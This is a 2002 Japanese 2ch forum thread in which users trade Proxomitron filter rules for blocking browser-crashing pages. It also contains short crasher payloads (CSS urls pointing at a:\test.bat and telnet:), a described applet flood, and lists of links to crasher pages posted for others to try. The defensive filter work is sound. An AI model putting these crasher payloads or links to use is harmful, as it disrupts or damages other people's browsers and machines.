このフィルタをオフにすると Kill Too Many Frames (2002/01/05) で防げました。
なんでかな。
718 :
名無しさん@お腹いっぱい。 :02/02/16 22:39 ID:AgSjVkX1
ちなみに Name = "Allow for frame resizing" Active = TRUE Bounds = "<fram*>" Limit = 256 Match = "(\#((frameborder|border)=\w|noresize|=(0|"0")$SET(\#==1 )))+ \1 >" Replace = "\@\1 border=1>" です。
719 :
名無しさん@お腹いっぱい。 :02/02/16 22:43 ID:AgSjVkX1
さっきから書いてばっかりで申し訳ないんですが、一応順序入れ替えで対処できましたので、 ありがとうございました。
720 :
名無しさん@お腹いっぱい。 :02/02/17 06:16 ID:NNSUfUJz
tocさんの所の「2ch Add Thumbnail」を使わせてもらってます。 この手のサムネイル表示のものだと、 jpgなどに偽装したブラクラは×で表示されるだけで、 実際の被害はないと考えて良いんでしょうか。
>>720 あ、たぶんないと思いますが、そのフィルタ自体、wahahaさんの
古いバージョンのAdd Linkをパクっていいかげんに修正して
作ったやつなので、、
>>722 その症状って時々聞くけど
右クリックってローカルファイルを実行してるだけなのに
なんで効かなくなるんだろ。
しかもほとんどのオミトロンユーザーは問題無い。
そのスクリプトの
var elm = parentwin.event.srcElement;
の下の行に
alert("elm.tagName : "+elm.tagName+" /elm.href : "+elm.href);
って入れて
http://2ch.net/を右クリックして実行してみて 。
elm.tagName : A /elm.href :
http://2ch.net/ っていうアラートダイアログが出るかどうか。
725 :
722 :02/02/18 07:51 ID:???
>>723 ありがとうございます。
>しかもほとんどのオミトロンユーザーは問題無い。
・・・まじですか? でもそうですよね、ローカルファイルの実行だけなんだから、ちょっと考えずらいですよね。
有益な情報ありがとうございます、慣れてないから、時間かかるけど、早速調べてやってみます。また、ご指導ください。
726 :
722 :02/02/18 07:54 ID:???
727 :
名無しさん@お腹いっぱい。 :02/02/18 11:56 ID:L+6d4iw8
>>727 </APPLET><APPLET code="com.daifukuya.chat.ChatApplet" codebase="
http://chat.daifukuya.com/ " width="10" height="10">
<PARAM name="channel" value="Sample #1">
を永遠と呼び出すみたいだね。
729 :
名無しさん@お腹いっぱい。 :02/02/18 19:03 ID:p2qpQOuf
>>728 ちなみに 1440 個のAPPLET でした。
それからちなみに、そういう場合は「延々と」という。
読み方は「えんえんと」
731 :
:02/02/18 19:32 ID:???
>>727 挑戦したけどなんともないので、他板でも確認してもらったけど
みんな(゚Д゚)ハア?って逝ってました。
732 :
722 :02/02/18 19:43 ID:???
>>731 ちっちゃな画像ファイル?が次々と表示されていくためCPU負荷がかかって
そのうちブラウザが落ちる。
Proxomitronって外部プロクシ一つずつしか登録できないの?
>>734 default.cfg 開いて [Proxies] 以下に記述しる。
738 :
:02/02/20 20:32 ID:???
>>738 HTML Contents Found
>>727 はchat.daifukuya.comに対するDoSアタックになるような。
どっちにしてもJavaScript, JAVA, ActiveXをふだんからオフにしてる
ひとには関係ないね。
>>727 対策に、こんなの書いてみました。
Name = "Kill Too Many Applet (2002/02/21)"
Active = TRUE
Limit = 2000
Match = "( <APPLET code=*/APPLET*<APPLET code=*/APPLET> "
" <APPLET code=*/APPLET*<APPLET code=*/APPLET> "
" <APPLET code=*/APPLET*<APPLET code=*/APPLET> "
" <APPLET code=*/APPLET*<APPLET code=*/APPLET> "
" <APPLET code=*/APPLET*<APPLET code=*/APPLET> )"
"$SET(#=<font size=1 color=red>[Too Many Applet Found]</font>\k)"
Replace = "\@"
当方、HTMLもよく理解していない消防なので、不具合が出るかも知れません。
詳しい方、評価および手直しをお願い致します。
745 :
744 :02/02/22 01:03 ID:???
間違えて、編集中のを書きこんでしまいました。 こっちです。 Name = "Kill Too Many Applet (2002/02/21)" Active = TRUE Limit = 2000 Match = "(<APPLET code=*/APPLET><APPLET code=*/APPLET> " " <APPLET code=*/APPLET><APPLET code=*/APPLET> " " <APPLET code=*/APPLET><APPLET code=*/APPLET> " " <APPLET code=*/APPLET><APPLET code=*/APPLET> " " <APPLET code=*/APPLET><APPLET code=*/APPLET>)" "$SET(#=<font size=1 color=red>[Too Many Applet Found]</font>\k)" Replace = "\@" スレ汚して、ごめんなさい逝ってきます。
俺は、APPLETタグは問答無用で殺してるぞ。 真っ当な使われ方をしてる所なんざぁ無きに等しいからな。
748 :
744 :02/02/22 07:35 ID:???
>>746 さんの話によると危ないものらしいので、少し変えてみました。
Name = "W Applet killer (2002/02/22)"
Active = TRUE
Limit = 2000
Match = "(<APPLET code=*/APPLET> "
" <APPLET code=*/APPLET>)"
"$SET(#=<font size=1 color=red>[W Applet Killed]</font>\k)"
Replace = "\@"
デフォにあるKill specific Java appletsとは違うの?
750 :
744 :02/02/23 00:05 ID:???
>>749 私の環境では"Kill specific Java applets"は
>>727 には効かなかったもので・・・。
W Appletの方はAppletタグが2つ連続で含まれる場合に
KILLするように書いたつもりです。
Too Manyですが
>>745 の方が効きが弱くなってしまってるので
Name = "Kill Too Many Applet (2002/02/23)"
Active = TRUE
Limit = 3000
Match = "(<APPLET code=*/APPLET*<APPLET code=*/APPLET* "
" <APPLET code=*/APPLET*<APPLET code=*/APPLET* "
" <APPLET code=*/APPLET*<APPLET code=*/APPLET* "
" <APPLET code=*/APPLET*<APPLET code=*/APPLET* "
" <APPLET code=*/APPLET*<APPLET code=*/APPLET>)"
"$SET(#=<font size=1 color=red>[Too Many Applet Found]</font>\k)"
Replace = "\@"
とした方が良いのかな。
スレのレベルを下げてしまってごめんなさい、もう名無しに戻ります。
>>750 それなぜか登録出来なくて調べたんだけど、2ch用に
半角全角スペース使ってるのな。
登録するときはMatchのところのスペース半角に直せばOKね。
752 :
名無しさん@お腹いっぱい。 :02/02/24 22:57 ID:2FrfKc6c
753 :
名無しさん@お腹いっぱい。 :02/02/24 23:42 ID:YvFg1qtD
背景、というか全体的にサイズががでかい以外 特に何にも起こらんかった。(ActiveXは元々切ってた) 単なる見難く、醜いサイト。
>>751 さん、失礼しました。フォローありがとうございます。
>>754 さん、もっもしかして"Kill specific"で殺せるということでしょうか?
前に書き忘れたんですが、"W Applet"と"Many Applet"を両方使う場合は
Wの方を上にした方が良いです。
756 :
754 :02/02/25 01:11 ID:???
>753 Proxomitoronで対抗するスレなんだから、JavaやAcriveXは有効にしとかないと。 私はwindows updateでproxyはずしたままウッカリ踏んでえらい目にあいましたが、なにか。
バイパスリストに [^/]++.microsoft.com/ 入れとけ。どっかで書いてたな
[^/]++windowsupdate.microsoft.com/ [^/]++download.windowsupdate.com/ は書いていたんだけど、ぜんぜんうまくいかずに外していた次第。 うまくいったりいかなかったり、サイト側がおかしいような気もします。
俺もomitronの設定のみじゃ、updateなんも反映されなかったよ。 だから確かomitron-Jんとこで、 proxyの例外として、proxyを使わない設定のとこに*windowsupdate*を追加すれば良い、 みたいな事が書かれてあった気がする。 実際それは、見事にIEセキュホールパッチの自動updateを可能にした。
>>761 最後の1行が英語の直訳みたいで笑ったよ。
[Refresh][Refresh]
printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")
printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")
printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")
printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")printf("\t\b\b")
[Unexpected Protocol Found] [Unexpected Protocol Found]
だとさ
>>758 よく解らんけど。
766 :
名無しさん@お腹いっぱい。 :02/02/25 16:46 ID:dIe0xJBk
767 :
766 :02/02/25 16:48 ID:???
758で既出&あげスマソ・・・
>>768 HTML Contents Found
で終了
>>768 このスレの途中までのフィルターしか入れてなかった漏れの場合。
なにやらノートンAVがしきりに立ち上がる。
なにやら固まる。
↓
Ctrl+Alt+Del再起動
なにやら再起動したのにOUTLOOKが沢山立ち上がろうとする。
↓
タスクマネージャ開けず、電源ボタン強制終了
>>770 のバイパスで踏んで見てたらこんなんでた
Locked on target machine...
We Are Now In Total Control
c AciD CyBOrG
You must be experiencing severe brain damage
to have followed that link,
so repent now, Lamer!
AciD sez : "Ctrl Alt Del or Die!"
ここちょっと↑かっこいいな(笑)
776 :
.. :02/02/28 15:12 ID:2mXoC/d+
limitのでかいフィルタばっかりだけど、 バイパスしてみたらあまりの速さに感動したとかって事はないの?
779 :
名無しさん@お腹いっぱい。 :02/02/28 18:00 ID:truJklhG
Name = " Kill" Active = TRUE Bounds = "[&](#|)[0-9a-z]+{1,*}(;|)(^=)" Limit = 256 Match = "\#" Replace = "<font title=\1>\@</font>" や&を使って表記された文字で書かれたアドレスにはリンクさせない ようにするフィルタつくったんですが、たまに誤爆します。
780 :
名無しさん@お腹いっぱい。 :02/02/28 18:08 ID:riKGdOC+
>>766 ショック。やられた。
>>763 みたいな記号が沢山でたのは同じだけど、
そのあとメーラーたちあがりまくり。
tocさんのフィルタは入れてるんだがなぜだろう?
781 :
名無しさん@お腹いっぱい。 :02/02/28 18:57 ID:truJklhG
>>780 Protect Contents Except HTMLでだいじょうぶなはずだけど...
Operaだとなんにも見えん。
783 :
名無しさん@お腹いっぱい。 :02/02/28 19:55 ID:eSoLNeyR
なんかおせーなーと思ったら、つい最近CPUがMendocinoCeleron300MHzな マシンに変更したのを忘れてた。。
784 :
名無しさん@お腹いっぱい。 :02/02/28 21:50 ID:riKGdOC+
>>781 サンキュー、なぜかそれだけ抜けてた。
本人?
キャップつけてって言ってんじゃん。んもー。
785 :
名無しさん@お腹いっぱい。 :02/02/28 22:23 ID:3ngk03QT
>785 やられた!てかウイルスかYO!!
787 :
名無しさん@お腹いっぱい。 :02/03/01 00:06 ID:6q29sq6s
さすがのオミトロンもウィルスには勝てないのか・・・。 ヤパーリ、迂闊にURLをクリックするもんじゃないね。 ところで、これって、パッチ当ててれば、削除するだけでOKなのでしょうか? 削除した後、アンチウィルスソフトでスキャンしても何も出て来なかったのですが。
788 :
:02/03/01 00:13 ID:???
なんてウィルス?
789 :
名無しさん@お腹いっぱい。 :02/03/01 00:18 ID:6q29sq6s
J.S. Exception exploit でした。
>>790 どうもです。
でもJAVAスクリプトならオミトロンで防げるのではないかと思ったり・・・。
792 :
779,781 :02/03/01 05:56 ID:k3vZTQJ6
>>784 いえ、作者じゃないです...
あと、779のフィルタ。誰かアドバイスくれるとウレシイデス。
>>792 そっか、ごめんネ
フィルタについては素人の俺にはなんもわからん。すまん。
JAVAスクリプトに屈したオミトロン・・・
795 :
779 :02/03/01 19:03 ID:ivGKHZxZ
Name = " Kiranai" Active = TRUE Bounds = "[&][^; ]+{1,6};" Limit = 20 Match = "([&](amp|(l|g)t|quot|#x002(2|6|a|c|)|#x003(c|e)|#x007c|#34|#38|#42|#44|#60|#62|#124);)\#" Replace = "\@" Name = " Kill" Active = TRUE Bounds = "[&](#|)[0-9a-z]+{1,*}(;|)(^=)" Limit = 256 Match = "\1" Replace = "<font title=\1>\1</font>" 779のフィルタ Match = "\1" Replace = "<font title=\1>\1</font>" でした。すみません。 あと、 &<>,*" の文字実態は先にマッチさせてきらないようにしてみました。 っていうかこのフィルタいらないかも・・・。 Kill Unexpected Protocolがあるし。
796 :
教習中 :02/03/01 21:26 ID:???
>>752 のソースで「getcookei」って、名前、メルアド抜いたぞ!ゴルア!
の意でしょうか?
それとも、特に気にしなくてもいいのでしょうか?
詳しい方いらっしゃいましたらご教示ください。
797 :
名無しさん@お腹いっぱい。 :02/03/02 06:17 ID:KnkDUJld
>>796 getcookieでクッキーの情報を送るのは
cookieのもともとの機能だと思います。
[HTTP headers]に
In = FALSE
Out = TRUE
Key = "Cookie: none"
Match = "*"
みたいなのを入れておけばクッキー送らずにすむと思います。
798 :
名無しさん@お腹いっぱい。 :02/03/02 06:21 ID:KnkDUJld
↑ In = FALSE Out = TRUE Key = "Cookie: none" Match = "*" 空白を少なかったです。すんません。
Proxomitron使うと2ちゃんに書き込めなくなりません?
>>800 書けますが?でも、このスレに相応しくない質問かと…(^_^;)。
802 :
教習中 :02/03/02 09:34 ID:???
>>797-798 ありがとうございました
今度ブラクラ持って来ます。
御礼がブラクラなんて・・・・・いいのかしら?
>>802 新しく入れなくてもデフォルトで Cookie: Kill a cookie (Out)
ってのがありますよ。
>>680 の問題の原因と解決法はわかったのでしょうか?
>>804 NISの問題では?うちの環境ではふつーに開けます
tocさんのブラクラ対策フィルタを入れなおした時に URLのマッチに^([^.]+.(2ch.net|bbspink.com)/)を入れ忘れてた。 どうも、妙に2ch表示がモタつくと思ってた。 2chをスルーさせたら2ch表示はやーくなって(゚∀゚)イイ!! 2chブラウザ糞くらえ
style="background-image:url(a:\test.jpg);"
style="background-image:url(a:\test.bat);" test..
" style="background-image:url(a:\test.jpg);"
style="background-image:url(telnet:2ch.net);"
style="background-image:url(telnet:2ch.net);" test..
" style="background-image:url(telnet:2ch.net);"
にしてもブラクラをのっけまくってる時点ですでに削除大賞だもんな。 このスレ。どれだけ荒らしに悪用されたんだろ。 少なくとも20人は悪用したんだろな。 いや、もっと多いか。
>815 なるほど、そりゃ言えるかもね。
ネトランにここが紹介されてたぞ。 あそこはほんとパクリばっかだな。
>819 いつものことだ。あの雑誌のレベルだとな。
822 :
1 :02/03/11 17:30 ID:???
823 :
名無しさん@お腹いっぱい。 :02/03/13 01:52 ID:qRhUNwZG
824 :
名無しさん@お腹いっぱい。 :02/03/13 10:25 ID:Sy+0dHoG
>>824 フィルタの順番、デバッグモードでの表示、なども報告してくださいませ。
>>785 を踏んだけどノートン反応しねーYO!
スレ違いっぽいけど
827 :
824 :02/03/13 16:37 ID:???
すいません。 Kill Quoted Meta Characterのチェックが外れてました。 逝ってきます。
>>827 逝ってらっしゃい。
おみやげ買ってきてね。
>>823 ハァ?
韓国語のサポートでも入れとけば?
つーかどこがブラクラなの?
>>823 おい。お前はそこのページを何の為に見るんだ。
部落ら募集age
Proxomitron4.2リリース!
ブラクラリリースきぼーん
835 :
名無しさん@お腹いっぱい。 :02/03/19 16:59 ID:Ih7TMyRs
836 :
名無しさん@お腹いっぱい。 :02/03/20 00:05 ID:RTJZ2579
めずらすぃブラクラきぼーん
838 :
名無しさん@お腹いっぱい。 :02/03/20 14:05 ID:4XhJqcTK
837, 838撃墜。 もうそろ落とせないものはなくなったような。
つーか、主流がウィルスになっちゃったからね。。
>>838 あれ数をもっと増やしたら、落ちるかな?
と言っても途中で中止にすればいいけどね。
843 :
名無しさん@お腹いっぱい。 :02/03/20 21:05 ID:f5oiCtbp
まだ防げるね
ウィルス以外はかなりの確率で防げるな。
Generator: 2channelerってw
>>842 mailto:以降の文字数を増やすとかしてマッチさせる部分のバイト数を
増やさないと意味ないのでは?
848 :
名無しさん@お腹いっぱい。 :02/03/21 13:21 ID:u+19DuRL
>>848 だいぶ長いけどまだ防いだね。
これブラクラ対策ないとえらいことになるんじゃないか?
今のところ最強の部落らはどれでしょうか? 踏んでみたいのですが、全部踏むわけにはいかないので。 それと、赤青点滅付きの最強ブラクラありますか?
とりあえずこれでしのいでください。 Name = "Kill Prompt (2002/03/21)" Active = TRUE Multi = TRUE Bounds = "$NEST(<script,</script>)" Limit = 16000 Match = "\1$SET(2=no)(prompt)\3\4$SET(#=\1\2\3\4)" Replace = "\@"
>>852 え?余裕で止まってるけど・・・。つーかこれブラクラ?
>>854 これはブラクラではないけどいろんな
応用を利かせるとブラクラが出来そう。
全然クイズじゃないとこがすごいね。
857 :
名無しさん@お腹いっぱい。 :02/03/22 00:47 ID:UTDmsoHg
>>854-855 ブラクラと言うよりは「ブラウザ閉じなくちゃ(;´д`)」にさせる代物だねぇ。。。
cgi.members.interq.or.jp/hokkaido/asato/upload/jam3ddr/OB000153.jpg ブラクラ www.adapo.net/upload/source/up0095.jpg ブラクラ homepage2.nifty.com/superpage/opai.htm ブラクラ isweb16.infoseek.co.jp/photo/tokioufo/hiroba.html ブラクラ www.raus.de/crashme ブラクラ mbspro5.uic.to/user/mikkixi.html ブラクラ mitsuura.tripod.co.jp/offmeeting.jpg ブラクラ www.hoops.ne.jp/~zaqro34/001MOVEBOX/index.html ブラクラ
862 :
名無しさん@お腹いっぱい。 :02/03/22 23:00 ID:im8atJqo
>>860 ブラクラとブラクラじゃないのをごちゃ混ぜで投稿されても嬉しくない。。。
863 :
830 :02/03/22 23:12 ID:???
必死に探したのに 分けてくださいな(W
865 :
名無しさん@お腹いっぱい。 :02/03/23 00:37 ID:LquXUuyU
868 :
名無しさん@お腹いっぱい。 :02/03/23 14:13 ID:D1kBkFf2
>>864 いかん、Crasher4と5にやられた(;´д`)ドウニカセネバ。。。
>>868 Kill Loop Scriptでいけるはずですが?
870 :
868 :02/03/23 20:53 ID:3Ze9yE/M
>>869 ダメでした、Kill (For|While|Javascript) Loop のフル装備で挑みましたが
ceasher4はIEのスクリプト停止処理に、5はタスクマネージャーの強制終了のお世話になりました。。。
Prox Ver4.2
IE ver 6.0.2600.0000
>>870 Name = "Kill Loop JavaScript (2002/01/06)"
Active = TRUE
Multi = TRUE
Bounds = "$NEST(< script,< / script >)|on[a-z]++="*'"
Limit = 16000
Match = "\0(while$SET(2=(false))|for$SET(2=(;false;)))\1 \(*\)\3$SET(#=\0\1\2\3)"
Replace = "\@"
これだよ?
>>871 俺も、それ入れてるのにやられた・・・。
今日はもう眠いので検証は明日・・・。
>>871 4,5ともに漏れはそれで撃墜できた。
出来ない人は何が原因なんだろう?
>>874 Match 133: Kill Too Many Frames (2002/01/05)
で撃墜。
877 :
872 :02/03/24 00:30 ID:???
ごめんなさい。 あまりにも気になったので調べたらバイパスしてわざと踏んだときのキャッシュを 読み込んでました。本当に申し訳ない>< 眠かったってことで許してください。おながいします
878 :
870 :02/03/24 01:47 ID:xBkzeK93
うぅ(;TдT) 1回だけ働いて「おっ!」と思ったのに もう一回読み込んだらまた……なぜにぃぃぃぃ。 ------そのときのMatch2つ---------- Match 1454: Kill Loop JavaScript (2002/01/06) Match 1454: Empty window-open killer
>>878 Ctrl+F5(強制再読み込み)してみそ
880 :
名無しさん@お腹いっぱい。 :02/03/24 10:26 ID:mjLYPUfG
882 :
4 :02/03/24 12:22 ID:???
880と881はトロイとのこと
FDDアタックを防ぐフィルタを教えてください。
886 :
883 :02/03/24 18:03 ID:???
>>887 Kill Loop JavaScriptで撃墜しました
>>894 ギャーギャーうるせぇ(;´Д`)
つか、ネタ系じゃなくてちゃんとしたブラクラ張ってくれよ
♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ 精神的ブラクラ
♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ ♠♣♦♥♠♣♦♥♠♣♦♥ 精神的ブラクラ2
失礼。どちらも同じ内容。
902 :
ブラ珍 :02/03/26 14:20 ID:97eTcBWv
908 :
名無しさん@お腹いっぱい。 :02/03/27 21:21 ID:q89uPm87
上にあるヤツらを撃墜するフィルターキボン
909 :
名無しさん@お腹いっぱい。 :02/03/27 21:55 ID:8pE7XP8+
>>908 マッチしたのでめぼしいのは
Match 1558: Local File Access Killer
Match 1559: Protect Contents Except HTML (2002/01/19)
くらいかな。
あのぉ・・・次スレ(あるの?)も近いことだし、どなたか今までの フィルタ&ブラクラをまとめていただけませんか?
>>909 Local File Access Killer使わなくていいのに。
Local File Access Killerをはずせば代わりに
Kill Unexpected Protocolがマッチするよ。
913 :
? :02/03/28 11:05 ID:???
914 :
:02/03/28 23:12 ID:???
test
もうオミトロンで防げないブラクラはないようだな。 やっとぐっすり寝れるよ。
916 :
名無しさん@お腹いっぱい。 :02/03/29 08:41 ID:h01TEcK6
917 :
名無しさん@お腹いっぱい。 :02/03/29 13:17 ID:wFNmErXt
>>917 Protect Contents Except HTML (2002/01/19)で撃墜!
918 :
( ○ ´ ー ` ○ ) :02/03/29 13:47 ID:XcKnwMoT
新スレは早すぎる。 このスレなら970くらいまで粘れるだろ?
とりあえずこれがプロトコルストーム攻撃に対する決定版…かな。 Name = "Protocol src killer MarkII" Active = TRUE Bounds = "<*>" Limit = 2048 Match = "*((src|code(base|)|archive|data|background)=$AV((^(http(s|)|ftp|gopher))&*:*))*" Replace = "<!-- Protocol src killed -->"
なぜTocさんところのブラクラ対策フィルタを使わない・・・
たんにめんどくさかったから。
OK
code(base|)|archive|dataなどの属性を使用したブラクラってありますか?
ki
929 :
名無しさん@お腹いっぱい。 :02/03/31 22:08 ID:WaMkhswg
>>917 Protect Contents Except HTML (2002/01/19)とはどんなフィルタなのですか?
平和だ
938 :
名無しさん@お腹いっぱい。 :02/04/04 19:21 ID:iSlkhhI6
イスラエルで何人も死んでるのにね。
どろどろ、から逃げてきた。
マターリ
あらよっ!
1000
のどイタイ
はぁ〜
腹減った。
よいしょ。
949ゲット!
カレー食うぞ。
奇遇だね。ぼくも今日カレーだったYO!
ほんわか
狂牛病騒動以来カレーを一度も食ってなかったんだけど、 かなりウマーかった。でもだいじょうぶなのかなぁ。。
954 :
名無しさん@お腹いっぱい。 :02/04/07 00:35 ID:KLbxWwaZ
ビーフ以外にだってカレーなんかいくらでもあるじゃん
>>954 おいおい、ルーに入ってる牛の骨髄を知らんの?
うぬ。
うの。
も んぺ。
999
ポッピロキー
961 :
名無しさん@お腹いっぱい。 :02/04/07 01:17 ID:KLbxWwaZ
ルー使わないで自分で作ればいいじゃん。
お空にアイ〜ン。
OOOO〜ッ。
風邪直った〜。
金玉フニャフニャやったわ=。
1000
腹減った。。。
プッ=。
おはよう。さぁ、仕事始めるか。
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ | エンヤー♪コラセー♪ゴルァ! | ................:::::::::::::::::::::::::::::::::::............. \____ _______/ ............::::::::::::::::::::::::::::::::::::::::::::::::::.............. |/ ミ __________ ヽ .\ ////\|//////\ / \ \ ////|___|./////:::::\\ ∧_∧/  ̄ /∠∠∠∠∠ ∠∠∠∠/:::::::::::::::\\ (;´Д`) i i i  ̄| ┌┬┐┌┬┐ |::::::::::::::::::::::::::::| ̄ ''""~"'''"/ ヽ''"~"__i i i--i | ├┼┤├┼┤ |::::::::||||||||||:::::::| ./| | | |  ̄ ̄ ̄ |:::::| | └┴┘└┴┘ |::::::::||||||||||:::::::| iiiiiiiiiiiii/ \ヽ/| |iiiiiiiiiiiiii::.. ノ__ノ || ̄|| ̄|| ̄|| ̄|| ̄|| |::::::::||||||||||:::::::| / \\| | ||_||_||_||_||_||_|::::::::||||||||||:::::::| / /⌒\ し(メ .i i i .|| ̄ ̄|| ̄ ̄|| ̄ ̄|| ̄ || ||乃三三-_ / / > ) \ ノノノ / / / / .\_ ザックザック し' (_つ /:::::/::... ザックザック ノ・ ./∴:・: ''""~~"''
∀・)<・・・
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ | エンヤー♪コラセー♪ゴルァ! | ................:::::::::::::::::::::::::::::::::::............. \____ _______/ ............::::::::::::::::::::::::::::::::::::::::::::::::::.............. |/ ミ __________ ヽ .\ ////\|//////\ / \ \ ////|___|./////:::::\\ ∧_∧/  ̄ /∠∠∠∠∠ ∠∠∠∠/:::::::::::::::\\ (;´Д`) i i i  ̄| ┌┬┐┌┬┐ |::::::::::::::::::::::::::::| ̄ ''""~"'''"/ ヽ''"~"__i i i--i | ├┼┤├┼┤ |::::::::||||||||||:::::::| ./| | | |  ̄ ̄ ̄ |:::::| | └┴┘└┴┘ |::::::::||||||||||:::::::| iiiiiiiiiiiii/ \ヽ/| |iiiiiiiiiiiiii::.. ノ__ノ || ̄|| ̄|| ̄|| ̄|| ̄|| |::::::::||||||||||:::::::| / \\| | ||_||_||_||_||_||_|::::::::||||||||||:::::::| / /⌒\ し(メ .i i i .|| ̄ ̄|| ̄ ̄|| ̄ ̄|| ̄ || ||乃三三-_ / / > ) \ ノノノ / / / / .\_ ザックザック し' (_つ /:::::/::... ザックザック ノ・ ./∴:・: ''""~~"''
腹減った。
ハァハァ…
ウソー、
天野め…
なんであんなのが…
絶対嘘や…
天野がどうした???
マイウ〜。
天野が大坪アナと…クソー
ハァハァ…
ma
i
u~
マイウ〜。
1000!
1000!!
1000!!
1000!!
1000!!
1000!!
1000!!1000!!
1000!!1000!!1000!!
1000!!
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。